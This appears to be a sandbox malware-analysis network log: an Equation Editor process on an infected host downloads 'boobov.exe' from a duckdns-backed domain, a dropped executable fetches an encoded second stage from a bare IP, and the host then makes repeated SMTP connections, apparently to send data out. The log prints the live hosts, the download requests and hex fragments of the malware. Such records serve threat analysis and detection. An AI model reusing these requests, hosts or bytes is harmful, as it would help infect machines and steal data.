Jan 27, 2021 19:31:01.713004112 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.906050920 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.906091928 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.906119108 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.906143904 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.906179905 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.906213999 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.906239986 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.906285048 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.906285048 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.906387091 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.906405926 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.906418085 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.906431913 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.906449080 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.906457901 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.906493902 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.906531096 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.906559944 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.906584978 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.907841921 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:02.099478006 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.099523067 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.099585056 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.099699974 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.099730015 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.099756956 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.099847078 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:02.099886894 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.099977016 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.100028038 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.100126982 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.100155115 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.100840092 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.100950003 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.101123095 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.101150990 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.101346016 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:02.292886019 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.293781042 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:02.294294119 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.294423103 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.294450045 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.294511080 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.294545889 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.294620037 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.294646025 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.294728041 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.295062065 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:02.295275927 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:02.295492887 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:02.487016916 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.487062931 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.487082005 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.487987995 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.492213964 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.492233038 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.501512051 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:02.698493958 CET	49175	587	192.168.2.22	198.54.122.60

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 19:29:35.743539095 CET	52197	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:29:35.968858957 CET	53	52197	8.8.8.8	192.168.2.22
Jan 27, 2021 19:30:18.302427053 CET	53099	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:30:18.358746052 CET	53	53099	8.8.8.8	192.168.2.22
Jan 27, 2021 19:30:18.359721899 CET	53099	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:30:18.416305065 CET	53	53099	8.8.8.8	192.168.2.22
Jan 27, 2021 19:30:24.889395952 CET	52838	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:30:24.945761919 CET	53	52838	8.8.8.8	192.168.2.22
Jan 27, 2021 19:30:24.946649075 CET	52838	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:30:25.009015083 CET	53	52838	8.8.8.8	192.168.2.22
Jan 27, 2021 19:30:26.787317038 CET	61200	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:30:26.837258101 CET	53	61200	8.8.8.8	192.168.2.22
Jan 27, 2021 19:30:26.850505114 CET	49548	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:30:26.898401976 CET	53	49548	8.8.8.8	192.168.2.22
Jan 27, 2021 19:30:32.899270058 CET	55627	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:30:32.947115898 CET	53	55627	8.8.8.8	192.168.2.22
Jan 27, 2021 19:30:32.947629929 CET	55627	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:30:32.995476007 CET	53	55627	8.8.8.8	192.168.2.22
Jan 27, 2021 19:30:42.171370029 CET	56009	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:30:42.229362965 CET	53	56009	8.8.8.8	192.168.2.22
Jan 27, 2021 19:30:52.314512014 CET	61865	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:30:52.362375975 CET	53	61865	8.8.8.8	192.168.2.22
Jan 27, 2021 19:30:58.741722107 CET	55171	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:30:58.801039934 CET	53	55171	8.8.8.8	192.168.2.22
Jan 27, 2021 19:30:58.801891088 CET	55171	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:30:58.852639914 CET	53	55171	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 27, 2021 19:29:35.743539095 CET	192.168.2.22	8.8.8.8	0x315e	Standard query (0)	cy.kl-re.com	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:18.302427053 CET	192.168.2.22	8.8.8.8	0xc52c	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:18.359721899 CET	192.168.2.22	8.8.8.8	0xc52c	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:24.889395952 CET	192.168.2.22	8.8.8.8	0x4d68	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:24.946649075 CET	192.168.2.22	8.8.8.8	0x4d68	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:32.899270058 CET	192.168.2.22	8.8.8.8	0xd43a	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:32.947629929 CET	192.168.2.22	8.8.8.8	0xd43a	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:42.171370029 CET	192.168.2.22	8.8.8.8	0xdaae	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:52.314512014 CET	192.168.2.22	8.8.8.8	0x535a	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:58.741722107 CET	192.168.2.22	8.8.8.8	0x2228	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:58.801891088 CET	192.168.2.22	8.8.8.8	0x2228	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 27, 2021 19:29:35.968858957 CET	8.8.8.8	192.168.2.22	0x315e	No error (0)	cy.kl-re.com	cybersng.duckdns.org		CNAME (Canonical name)	IN (0x0001)
Jan 27, 2021 19:29:35.968858957 CET	8.8.8.8	192.168.2.22	0x315e	No error (0)	cybersng.duckdns.org		172.111.202.41	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:18.358746052 CET	8.8.8.8	192.168.2.22	0xc52c	No error (0)	mail.privateemail.com		198.54.122.60	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:18.416305065 CET	8.8.8.8	192.168.2.22	0xc52c	No error (0)	mail.privateemail.com		198.54.122.60	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:24.945761919 CET	8.8.8.8	192.168.2.22	0x4d68	No error (0)	mail.privateemail.com		198.54.122.60	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:25.009015083 CET	8.8.8.8	192.168.2.22	0x4d68	No error (0)	mail.privateemail.com		198.54.122.60	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:32.947115898 CET	8.8.8.8	192.168.2.22	0xd43a	No error (0)	mail.privateemail.com		198.54.122.60	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:32.995476007 CET	8.8.8.8	192.168.2.22	0xd43a	No error (0)	mail.privateemail.com		198.54.122.60	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:42.229362965 CET	8.8.8.8	192.168.2.22	0xdaae	No error (0)	mail.privateemail.com		198.54.122.60	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:52.362375975 CET	8.8.8.8	192.168.2.22	0x535a	No error (0)	mail.privateemail.com		198.54.122.60	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:58.801039934 CET	8.8.8.8	192.168.2.22	0x2228	No error (0)	mail.privateemail.com		198.54.122.60	A (IP address)	IN (0x0001)
Jan 27, 2021 19:30:58.852639914 CET	8.8.8.8	192.168.2.22	0x2228	No error (0)	mail.privateemail.com		198.54.122.60	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

cy.kl-re.com

193.239.147.103

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	172.111.202.41	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 27, 2021 19:29:36.072925091 CET	0	OUT	GET //power/bo/boobov.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: cy.kl-re.com Connection: Keep-Alive
Jan 27, 2021 19:29:36.354144096 CET	2	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 27 Jan 2021 18:29:36 GMT Content-Type: application/x-msdownload Content-Length: 246784 Connection: keep-alive Last-Modified: Tue, 26 Jan 2021 23:18:29 GMT X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Nginx-Upstream-Cache-Status: EXPIRED X-Server-Powered-By: Engintron Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 a3 10 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b6 03 00 00 0c 00 00 00 00 00 00 1e d4 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 ac d0 03 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 d3 03 00 57 00 00 00 00 e0 03 00 e8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 b4 03 00 00 20 00 00 00 b6 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 08 00 00 00 e0 03 00 00 0a 00 00 00 b8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 c2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 03 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 2e 00 00 d0 a4 03 00 0b 00 02 00 04 00 00 06 00 00 00 00 00 00 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a ba 72 5c 91 00 70 28 4e 03 00 0a 80 01 00 00 04 73 8a 00 00 0a 80 02 00 00 04 72 60 91 00 70 80 03 00 00 04 73 4f 03 00 0a 80 04 00 00 04 2a a6 72 d3 93 00 70 19 8d 06 00 00 01 25 16 72 e7 93 00 70 a2 25 17 72 8b 93 00 70 a2 25 18 72 eb 93 00 70 a2 28 3c 02 00 0a 2a c6 72 ef 93 00 70 1a 8d 06 00 00 01 25 16 72 e7 93 00 70 a2 25 17 72 8f 93 00 70 a2 25 18 72 8b 93 00 70 a2 25 19 72 eb 93 00 70 a2 28 3c 02 00 0a 2a c6 72 ef 93 00 70 1a 8d 06 00 00 01 25 16 72 3d 66 00 70 a2 25 17 72 a3 93 00 70 a2 25 18 72 3d 66 00 70 a2 25 19 72 09 67 00 70 a2 28 3c 02 00 0a 2a 7e 7e 05 00 00 04 3a 0f 00 00 00 28 30 00 00 06 73 67 03 00 0a 80 05 00 00 04 7e 05 00 00 04 2a 1a 20 00 00 00 00 2a 32 72 78 96 00 70 14 28 29 00 00 06 2a 32 72 ae 96 00 70 14 28 29 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL ` @ `W H.text$ `.rsrc@@.reloc@BH.P r\p(Nsr`psOrp%rp%rp%rp(<rp%rp%rp%rp%rp(<rp%r=fp%rp%r=fp%rgp(<~~:(0sg~ 2rxp()2rp()
Jan 27, 2021 19:29:36.354203939 CET	3	IN	Data Raw: 00 06 2a 2e d0 e6 00 00 01 28 12 00 00 0a 2a 7e 7e 0b 00 00 04 3a 0f 00 00 00 28 3a 00 00 06 73 6d 03 00 0a 80 0b 00 00 04 7e 0b 00 00 04 2a fa fe 09 01 00 39 30 00 00 00 28 32 00 00 06 39 18 00 00 00 fe 09 00 00 72 de 96 00 70 fe 09 01 00 28 6a Data Ascii: .(~~:(:sm~90(29rp(j((<*2r:p(32rVp(3.(0%sP%(oQoR8(SsT(Uo
Jan 27, 2021 19:29:36.354243994 CET	4	IN	Data Raw: ff a1 fe ff ff d1 fe ff ff e0 fe ff ff f9 fe ff ff 21 ff ff ff 33 ff ff ff 52 ff ff ff 83 ff ff ff a7 ff ff ff dd 67 00 00 00 fe 0c 02 00 fe 0e 01 00 fe 0c 00 00 20 fe ff ff ff 3d 0a 00 00 00 20 01 00 00 00 38 04 00 00 00 fe 0c 00 00 45 02 00 00 Data Ascii: !3Rg = 8Ev1u% _ _t%(Y 3(fz9(Z*A<0RrpA%rp%rap%
Jan 27, 2021 19:29:36.354281902 CET	6	IN	Data Raw: 39 35 00 00 00 72 b4 95 00 70 20 02 00 00 00 8d 06 00 00 01 25 20 00 00 00 00 fe 09 00 00 a2 25 20 01 00 00 00 fe 09 01 00 a2 28 6a 03 00 0a 72 ec 95 00 70 28 0d 00 00 0a 2a fe 09 00 00 fe 09 01 00 28 6b 03 00 0a 2a 00 00 00 13 30 05 00 5c 00 00 Data Ascii: 95rp % % (jrp((k0\((9@rp % % % (jr,p((e0k((9KrFp % % %
Jan 27, 2021 19:29:36.354320049 CET	7	IN	Data Raw: 00 09 1b 01 00 da 82 01 00 06 00 11 83 01 00 da 82 01 00 06 00 17 83 01 00 da 82 01 00 06 00 27 83 01 00 da 82 01 00 0e 00 2f 83 01 00 3b 83 01 00 0e 00 46 83 01 00 3b 83 01 00 0e 00 51 83 01 00 3b 83 01 00 0e 00 9a 2d 00 00 3b 83 01 00 0e 00 68 Data Ascii: '/;F;Q;-;h;ua;p??d?.q0ipIipop(:
Jan 27, 2021 19:29:36.354357004 CET	8	IN	Data Raw: 00 0a 00 3e 88 01 00 70 81 01 00 0a 00 32 68 00 00 70 81 01 00 0a 00 62 69 00 00 70 81 01 00 0a 00 6a 68 00 00 70 81 01 00 0a 00 d6 68 00 00 70 81 01 00 0a 00 0a 69 00 00 70 81 01 00 0a 00 e2 6b 00 00 5f 81 01 00 0a 00 5c 88 01 00 5f 81 01 00 0a Data Ascii: >p2hpbipjhphpipk_\_~hp>gakaOkkkgpjalnla=oagaqa
Jan 27, 2021 19:29:36.354404926 CET	10	IN	Data Raw: db 01 00 af 21 00 00 08 00 91 00 57 94 01 00 7a 35 01 00 54 2b 00 00 00 00 93 00 3b 93 01 00 3e 4c 01 00 e0 2b 00 00 00 00 93 00 92 93 01 00 8c 34 01 00 30 2c 00 00 08 00 93 00 b4 99 01 00 7d db 01 00 8c 2c 00 00 08 00 93 00 8d 98 01 00 83 db 01 Data Ascii: !Wz5T+;>L+40,},,!B5!B5!!64!@z5l->L!'4-}$.
Jan 27, 2021 19:29:36.354448080 CET	11	IN	Data Raw: 82 49 00 ae 61 00 00 06 82 e9 00 d2 64 00 00 0d 82 a9 01 8a 88 00 00 70 34 49 00 db c5 00 00 b4 36 d1 01 62 1b 01 00 14 82 49 00 f5 61 00 00 40 81 61 00 72 1b 01 00 44 37 09 01 cb 9d 00 00 44 37 d9 01 3e 7e 00 00 79 34 d9 01 d5 9d 00 00 44 37 d9 Data Ascii: Iadp4I6bIa@arD7D7>~y4D7\|64e5k4ey4k4Isd"D7\|(D7ISIp44BDLI/64]65I5]6<AA
Jan 27, 2021 19:29:36.354485989 CET	13	IN	Data Raw: 03 0e 5c 00 00 06 83 01 03 e2 59 00 00 06 83 01 03 8a 2a 00 00 06 83 01 03 47 28 00 00 06 83 01 03 34 2a 00 00 06 83 01 03 22 2b 00 00 06 83 01 03 71 5d 00 00 06 83 01 03 28 28 00 00 06 83 01 03 b6 2a 00 00 06 83 01 03 66 2a 00 00 06 83 01 03 53 Data Ascii: \YG(4"+q]((fSbE(o))(1+**((s{***
Jan 27, 2021 19:29:36.354525089 CET	14	IN	Data Raw: 29 00 00 06 83 01 03 96 29 00 00 06 83 01 03 a6 28 00 00 06 83 01 03 2b 29 00 00 06 83 01 03 45 2a 00 00 06 83 01 03 b4 28 00 00 06 83 01 03 39 29 00 00 06 83 01 03 cf 28 00 00 06 83 01 03 54 29 00 00 06 83 01 03 ea 28 00 00 06 83 01 03 6f 29 00 Data Ascii: ))(+)E(9)(T)(o)))`())t(( ))]*+1>~y49D79I>~I>~1ay4A6I>~
Jan 27, 2021 19:29:36.440202951 CET	16	IN	Data Raw: 00 46 85 e1 03 26 1b 01 00 51 85 e1 03 26 1b 01 00 59 85 e1 03 26 1b 01 00 65 85 e1 03 26 1b 01 00 6e 85 b9 00 05 3a 00 00 75 85 79 04 3e 7e 00 00 79 34 89 04 a0 22 01 00 7c 85 d9 01 3e 7e 00 00 c7 55 c9 02 d2 64 00 00 74 34 c9 01 ac 22 01 00 83 Data Ascii: F&Q&Y&e&n:uy>~y4"\|>~Udt4"J"Ja>~k4"Ka>~L>~k4wDnm""p4i"16#I#Sl5Y>~y4I#/\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	193.239.147.103	80	C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Timestamp	kBytes transferred	Direction	Data
Jan 27, 2021 19:29:37.731040955 CET	262	OUT	GET /base/9158412CBF14FB744AFA9F0D01F6CDF2.html HTTP/1.1 Host: 193.239.147.103 Connection: Keep-Alive
Jan 27, 2021 19:29:37.780169010 CET	263	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 27 Jan 2021 18:29:37 GMT Content-Type: text/html Content-Length: 912812 Last-Modified: Tue, 26 Jan 2021 23:17:49 GMT Connection: keep-alive Vary: Accept-Encoding ETag: "6010a31d-dedac" X-Frame-Options: SAMEORIGIN Accept-Ranges: bytes Data Raw: 3c 70 3e 4b 4b 48 59 47 48 6f 6d 6d 48 47 48 65 48 47 48 47 48 47 48 6d 48 47 48 47 48 47 48 77 55 55 48 77 55 55 48 47 48 47 48 6f 72 6d 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 42 6d 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 6f 77 72 48 47 48 47 48 47 48 6f 6d 48 65 6f 48 6f 72 42 48 6f 6d 48 47 48 6f 72 47 48 59 48 77 47 55 48 65 65 48 6f 72 6d 48 6f 48 4b 42 48 77 47 55 48 65 65 48 72 6d 48 6f 47 6d 48 6f 47 55 48 6f 6f 55 48 65 77 48 6f 6f 77 48 6f 6f 6d 48 6f 6f 6f 48 6f 47 65 48 6f 6f 6d 48 59 4b 48 6f 47 59 48 65 77 48 59 59 48 59 4b 48 6f 6f 47 48 6f 6f 47 48 6f 6f 6f 48 6f 6f 42 48 65 77 48 59 72 48 6f 47 6f 48 65 77 48 6f 6f 6d 48 6f 6f 4b 48 6f 6f 47 48 65 77 48 6f 47 55 48 6f 6f 47 48 65 77 48 42 72 48 4b 59 48 72 65 48 65 77 48 6f 47 59 48 6f 6f 6f 48 6f 47 47 48 6f 47 6f 48 6d 42 48 6f 65 48 6f 65 48 6f 47 48 65 42 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 72 47 48 42 59 48 47 48 47 48 4b 42 48 6f 48 65 48 47 48 77 42 48 6f 42 65 48 6f 42 48 59 42 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 77 77 6d 48 47 48 65 6d 48 47 48 6f 6f 48 6f 48 72 47 48 47 48 47 48 77 55 6d 48 65 48 47 48 47 48 42 48 47 48 47 48 47 48 47 48 47 48 47 48 42 77 48 77 59 48 6d 48 47 48 47 48 65 77 48 47 48 47 48 47 48 65 77 48 6d 48 47 48 47 48 47 48 47 48 6f 42 48 47 48 65 77 48 47 48 47 48 47 48 77 48 47 48 47 48 6d 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 42 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 59 42 48 6d 48 47 48 47 48 77 48 47 48 47 48 47 48 47 48 47 48 47 48 77 48 47 48 59 42 48 6f 65 65 48 47 48 47 48 6f 42 48 47 48 47 48 6f 42 48 47 48 47 48 47 48 47 48 6f 42 48 47 48 47 48 6f 42 48 47 48 47 48 47 48 47 48 47 48 47 48 6f 42 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 77 65 42 48 77 72 48 6d 48 47 48 4b 59 48 47 48 47 48 47 48 47 48 65 77 48 6d 48 47 48 72 72 48 65 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 42 6d 48 6d 48 47 48 6f 77 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 65 77 48 47 48 47 48 72 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 72 48 65 77 48 47 48 47 48 4b 77 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 6d 42 48 6f 6f 42 48 6f 47 6f 48 6f 77 47 48 6f 6f 42 48 47 48 47 48 47 48 42 72 48 77 55 65 48 65 48 47 48 47 48 65 77 48 47 48 47 48 47 48 77 55 6d 48 65 48 47 48 47 48 77 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 65 77 48 47 48 47 48 59 42 48 6d 42 48 6f 6f 6d 48 6f 6f 55 48 6f 6f 6d 48 59 59 48 47 48 47 48 47 48 72 72 48 65 48 47 48 47 48 47 48 65 77 48 6d 48 47 48 47 48 6d 48 47 48 47 48 47 48 47 48 6d Data Ascii: <p>KKHYGHommHGHeHGHGHGHmHGHGHGHwUUHwUUHGHGHormHGHGHGHGHGHGHGHBmHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHowrHGHGHGHomHeoHorBHomHGHorGHYHwGUHeeHormHoHKBHwGUHeeHrmHoGmHoGUHooUHewHoowHoomHoooHoGeHoomHYKHoGYHewHYYHYKHooGHooGHoooHooBHewHYrHoGoHewHoomHooKHooGHewHoGUHooGHewHBrHKYHreHewHoGYHoooHoGGHoGoHmBHoeHoeHoGHeBHGHGHGHGHGHGHGHrGHBYHGHGHKBHoHeHGHwBHoBeHoBHYBHGHGHGHGHGHGHGHGHwwmHGHemHGHooHoHrGHGHGHwUmHeHGHGHBHGHGHGHGHGHGHBwHwYHmHGHGHewHGHGHGHewHmHGHGHGHGHoBHGHewHGHGHGHwHGHGHmHGHGHGHGHGHGHGHBHGHGHGHGHGHGHGHGHYBHmHGHGHwHGHGHGHGHGHGHwHGHYBHoeeHGHGHoBHGHGHoBHGHGHGHGHoBHGHGHoBHGHGHGHGHGHGHoBHGHGHGHGHGHGHGHGHGHGHGHweBHwrHmHGHKYHGHGHGHGHewHmHGHrrHeHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHBmHmHGHowHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHewHGHGHrHGHGHGHGHGHGHGHGHGHGHGHrHewHGHGHKwHGHGHGHGHGHGHGHGHGHGHGHmBHooBHoGoHowGHooBHGHGHGHBrHwUeHeHGHGHewHGHGHGHwUmHeHGHGHwHGHGHGHGHGHGHGHGHGHGHGHGHGHGHewHGHGHYBHmBHoomHooUHoomHYYHGHGHGHrrHeHGHGHGHewHmHGHGHmHGHGHGHGHm
